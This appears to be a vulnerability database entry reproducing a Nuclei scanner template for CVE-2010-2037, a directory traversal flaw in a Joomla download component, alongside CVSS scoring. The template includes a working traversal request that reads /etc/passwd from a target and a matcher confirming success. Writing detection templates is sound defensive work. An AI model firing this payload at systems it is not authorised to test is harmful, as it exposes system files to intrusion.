Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-2037
HistorySep 11, 2021 - 10:10 p.m.

Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal

2021-09-1122:10:08
ProjectDiscovery
github.com
4
cve2010
joomla
percha
directorytraversal
exploitdb
packetstorm
localfileinclusion

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.1

Confidence

High

EPSS

0.007

Percentile

80.8%

A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-2037

info:
  name: Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/34005
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2037
    - http://packetstormsecurity.org/1005-exploits/joomlaperchada-lfi.txt
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-2037
    cwe-id: CWE-22
    epss-score: 0.08973
    epss-percentile: 0.94583
    cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: percha
    product: com_perchadownloadsattach
  tags: cve2010,cve,joomla,edb,packetstorm,lfi,percha

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ba2f173a61884eb77eca05645e474ea0998974ae81cd2f56a2df04bbad2382af022100a52f1e7d8dd7915e7ae5f9d64e3601969a06347ffbbfe263f7c204d53ffc9512:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.1

Confidence

High

EPSS

0.007

Percentile

80.8%

Related for NUCLEI:CVE-2010-2037